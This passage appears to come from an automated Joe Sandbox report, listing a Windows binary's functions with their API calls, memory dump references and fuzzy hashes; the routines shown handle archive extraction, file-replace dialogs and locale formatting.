                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 37d0ad8a3a3dd37a3ea991e330c312dfc612f9ab2e454a90a12c4a71a0d070a5
                                                                                      • Instruction ID: f0651cc80da7228c612517e568b97bc8cc1752129692e076a9af74a527ffb13a
                                                                                      • Opcode Fuzzy Hash: 37d0ad8a3a3dd37a3ea991e330c312dfc612f9ab2e454a90a12c4a71a0d070a5
                                                                                      • Instruction Fuzzy Hash: 98A011A22BA002FC3008B2A02C02C3B020CC0C2F20330A80EF80280080A8A008082230
                                                                                      Function 00D8C76E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D8C738
                                                                                        • Part of subcall function 00D8CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D8CB39
                                                                                        • Part of subcall function 00D8CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D8CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: cc174323b791ae7ba6378cd5a8a4b469b9ba203adcc3a8e9258c783a86c0446b
                                                                                      • Instruction ID: f0651cc80da7228c612517e568b97bc8cc1752129692e076a9af74a527ffb13a
                                                                                      • Opcode Fuzzy Hash: cc174323b791ae7ba6378cd5a8a4b469b9ba203adcc3a8e9258c783a86c0446b
                                                                                      • Instruction Fuzzy Hash: 98A011A22BA002FC3008B2A02C02C3B020CC0C2F20330A80EF80280080A8A008082230
                                                                                      Function 00D79B6A Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetEndOfFile.KERNELBASE(?,00D78EDB,?,?,-00001954), ref: 00D79B6D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: File
                                                                                      • String ID:
                                                                                      • API String ID: 749574446-0
                                                                                      • Opcode ID: 236a118614337bcdec591850584676e7f1fce09846c74281231c272b54ea8df3
                                                                                      • Instruction ID: 2fd489314ecdb8826496baba0ddc700a7c90f8e22a4ca2ba8d70c0564111145c
                                                                                      • Opcode Fuzzy Hash: 236a118614337bcdec591850584676e7f1fce09846c74281231c272b54ea8df3
                                                                                      • Instruction Fuzzy Hash: 8BB011300E000A8A8E002B30CC088203E20EA2230A30082A0A00AC82A0CB23C002AA28
                                                                                      Function 00D89023 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,00D8927A,00DB2120,00000000,00DB3122,00000006), ref: 00D89027
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectory
                                                                                      • String ID:
                                                                                      • API String ID: 1611563598-0
                                                                                      • Opcode ID: 0766f61ee72784b7df97d0facb1b0c7bd6003476f9191f8fa29a0eac610767c4
                                                                                      • Instruction ID: eb2851a3abfa5caed6cb80cf5953aac8c91ec32883366c1b017e4af9dccb17a9
                                                                                      • Opcode Fuzzy Hash: 0766f61ee72784b7df97d0facb1b0c7bd6003476f9191f8fa29a0eac610767c4
                                                                                      • Instruction Fuzzy Hash: 51A0123019430646CA400B30CC09C157A549761702F0086207002C00A0CB308810E511
                                                                                      Function 00D794A3 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(000000FF,?,?,00D79473), ref: 00D794BE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: be366deac609a11814f1300415d6540fe0c53cccdf224cb52082b8d8eb696188
                                                                                      • Instruction ID: 74b9232834c1550203e81b084f0dbf018248227b9cff28f1b7badb15620d5ae9
                                                                                      • Opcode Fuzzy Hash: be366deac609a11814f1300415d6540fe0c53cccdf224cb52082b8d8eb696188
                                                                                      • Instruction Fuzzy Hash: 1CF0E231192B144FDF308A24D518792F7E89B1273AF08CB1ED0EE439D0E371A84A8B35

                                                                                      Non-executed Functions

                                                                                      Function 00D8A537 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 289timewindowfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00D712E7: GetDlgItem.USER32(00000000,00003021), ref: 00D7132B
                                                                                        • Part of subcall function 00D712E7: SetWindowTextW.USER32(00000000,00DA02E4), ref: 00D71341
                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00D8A5C8
                                                                                      • EndDialog.USER32(?,00000006), ref: 00D8A5DB
                                                                                      • GetDlgItem.USER32(?,0000006C), ref: 00D8A5F7
                                                                                      • SetFocus.USER32(00000000), ref: 00D8A5FE
                                                                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00D8A63E
                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00D8A671
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00D8A687
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D8A6A5
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D8A6B5
                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D8A6D2
                                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D8A6F0
                                                                                        • Part of subcall function 00D7D142: LoadStringW.USER32(?,?,00000200,?), ref: 00D7D187
                                                                                        • Part of subcall function 00D7D142: LoadStringW.USER32(?,?,00000200,?), ref: 00D7D19D
                                                                                      • _swprintf.LIBCMT ref: 00D8A720
                                                                                        • Part of subcall function 00D73F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D73F6E
                                                                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00D8A733
                                                                                      • FindClose.KERNEL32(00000000), ref: 00D8A736
                                                                                      • _swprintf.LIBCMT ref: 00D8A791
                                                                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 00D8A7A4
                                                                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00D8A7BA
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00D8A7DA
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D8A7EA
                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D8A804
                                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D8A81C
                                                                                      • _swprintf.LIBCMT ref: 00D8A84D
                                                                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00D8A860
                                                                                      • _swprintf.LIBCMT ref: 00D8A8B0
                                                                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 00D8A8C3
                                                                                        • Part of subcall function 00D8932F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D89355
                                                                                        • Part of subcall function 00D8932F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00DAA154,?,?), ref: 00D893A4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                      • API String ID: 3227067027-1840816070
                                                                                      • Opcode ID: 1306b3ef0b92680953a0ee945a44700d0b467774553dbf58c8a6625a19834e8c
                                                                                      • Instruction ID: f26d9ffa7e91f1b21c2b6e7bb74bff08fd5d4e8a07391ed07eea4eb9e062cf95
                                                                                      • Opcode Fuzzy Hash: 1306b3ef0b92680953a0ee945a44700d0b467774553dbf58c8a6625a19834e8c
                                                                                      • Instruction Fuzzy Hash: 98917672548349BFE621EBA4CC49FFB77ACEB4A700F04491AF649D6180E77196058773
                                                                                      Function 00D77070 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 299fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D77075
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00D771D5
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D771E5
                                                                                        • Part of subcall function 00D77A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D77AAC
                                                                                        • Part of subcall function 00D77A9D: GetLastError.KERNEL32 ref: 00D77AF2
                                                                                        • Part of subcall function 00D77A9D: CloseHandle.KERNEL32(?), ref: 00D77B01
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00D771F0
                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00D772FE
                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00D7732A
                                                                                      • CloseHandle.KERNEL32(?), ref: 00D7733C
                                                                                      • GetLastError.KERNEL32(00000015,00000000,?), ref: 00D7734C
                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00D77398
                                                                                      • DeleteFileW.KERNEL32(?), ref: 00D773C0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                      • API String ID: 3935142422-3508440684
                                                                                      • Opcode ID: c58290825d41a2d12b32aab1bb83574f0df36c8b9a898fb740d0bb445d957a80
                                                                                      • Instruction ID: a8293d46c46e29233e2c19879888f719d93b70e873c21d3bbdada707c2f85a15
                                                                                      • Opcode Fuzzy Hash: c58290825d41a2d12b32aab1bb83574f0df36c8b9a898fb740d0bb445d957a80
                                                                                      • Instruction Fuzzy Hash: 12B1AE71904218ABDF21DF64CC45BEE77B8EF09304F14896AF959E7282E730AA45CB71
                                                                                      Function 00D73203 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 604COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog_memcmp
                                                                                      • String ID: CMT$h%u$hc%u
                                                                                      • API String ID: 3004599000-3282847064
                                                                                      • Opcode ID: f2ce574f67a567fd57cf4a943a4bbbf725d0a36bcc06801b2a460534dc10493f
                                                                                      • Instruction ID: ea0657b9a9e77989c00005697d7df3458c56381b7b1aefd179601281ae5e2dc5
                                                                                      • Opcode Fuzzy Hash: f2ce574f67a567fd57cf4a943a4bbbf725d0a36bcc06801b2a460534dc10493f
                                                                                      • Instruction Fuzzy Hash: CC3290715142849FDF18DF64C896AEA37A5EF15300F48857DFD8E8B282EB709A48CB70
                                                                                      Function 00D9A35E Relevance: 11.9, APIs: 1, Strings: 5, Instructions: 1381COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: __floor_pentium4
                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$d0F
                                                                                      • API String ID: 4168288129-863156498
                                                                                      • Opcode ID: 1a56f2135c2deadde1b3e1e4d6316898a505b61e6f7b5f44d1acff41920a6aee
                                                                                      • Instruction ID: 210737aa754985d78f0c221b715ed67191272c51ca5c6985200e02665be2a7e1
                                                                                      • Opcode Fuzzy Hash: 1a56f2135c2deadde1b3e1e4d6316898a505b61e6f7b5f44d1acff41920a6aee
                                                                                      • Instruction Fuzzy Hash: 4FC24C72E046288FDF25CE28DD407E9B7B5EB84315F1941EAD84DE7240E774AE818FA1
                                                                                      Function 00D7276C Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 793COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D72775
                                                                                      • _strlen.LIBCMT ref: 00D72CFF
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D72E56
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                                      • String ID: CMT
                                                                                      • API String ID: 3741668355-2756464174
                                                                                      • Opcode ID: d36241517d43e7f9b6b3a455c77f06b7fab1e0bd8129a33ba2295b39f784daf4
                                                                                      • Instruction ID: a6e312f89fd6c7817c803f0e8dd79009028e9291c81e0721a4c00bcdbf138b6c
                                                                                      • Opcode Fuzzy Hash: d36241517d43e7f9b6b3a455c77f06b7fab1e0bd8129a33ba2295b39f784daf4
                                                                                      • Instruction Fuzzy Hash: E362C2715002848FDB29DF68C8956FA3BE1EF54304F08857EEC9E8B286E7719949CB70
                                                                                      Function 00D95B53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D95C4B
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D95C55
                                                                                      • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00D95C62
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                      • String ID: d0F
                                                                                      • API String ID: 3906539128-1238022483
                                                                                      • Opcode ID: 93333217a0b25ea831337e258db3cf9056f8f25f801de68cf62274c6d34946b1
                                                                                      • Instruction ID: 26ee80903113e6125fb04b9fa1c8083f3a368792a9bd3e725cb398465e010def
                                                                                      • Opcode Fuzzy Hash: 93333217a0b25ea831337e258db3cf9056f8f25f801de68cf62274c6d34946b1
                                                                                      • Instruction Fuzzy Hash: 1C31B4749013299BCB21DF64D989B9DBBB4FF18310F5041EAE40CA7290E7709B818F54
                                                                                      Function 00D99EB0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                      • Instruction ID: 72520cb57c54ed58ec6db8056d900caf4b371f9c207561cee3a2d4e4ff1d275a
                                                                                      • Opcode Fuzzy Hash: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                                                                      • Instruction Fuzzy Hash: 64021D72E012199FDF14CFADC8806ADF7F1FF48314F19826AD919E7284D731A9418BA5
                                                                                      Function 00D8932F Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D89355
                                                                                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,00DAA154,?,?), ref: 00D893A4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
